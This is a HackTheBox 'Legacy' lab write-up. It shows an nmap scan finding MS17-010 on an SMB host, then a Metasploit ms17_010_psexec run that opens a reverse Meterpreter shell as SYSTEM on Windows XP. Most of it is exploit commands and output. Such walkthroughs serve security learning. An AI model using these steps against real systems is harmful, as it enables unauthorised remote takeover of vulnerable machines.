HTB: Legacy

Legacy

Following on from Jerry in number of pwns is Legacy. I go in blind.

Ports

It’s SMB only, on 139/445. Looks like Windows.

SMB

Given what this is, let’s try a special nmap scan:

┌──(root💀kali)-[/opt/htb/legacy]
└─# nmap -p445 --script smb-vuln-ms17-010 10.10.10.4       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 05:20 EST
Nmap scan report for 10.10.10.4
Host is up (0.24s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 3.82 seconds

Okay, it’s pretty obvious where this is going.

Yeeting MSF again

msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.2
LHOST => 10.10.14.2                                                                                                                                                             
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4                                                                                                               
RHOSTS => 10.10.10.4                                                                                                                                                            
msf6 exploit(windows/smb/ms17_010_psexec) > run                                                                                                                                 
                                                                                                                                                                                
[*] Started reverse TCP handler on 10.10.14.2:4444                                                                                                                              
[*] 10.10.10.4:445 - Target OS: Windows 5.1                                                                                                                                     
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81b07da8
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... onfjZZCq.exe
[*] 10.10.10.4:445 - Created \onfjZZCq.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \onfjZZCq.exe...
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.4:1031) at 2021-03-05 05:22:00 -0500

meterpreter > shell
Process 1288 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And the flags followed shortly after.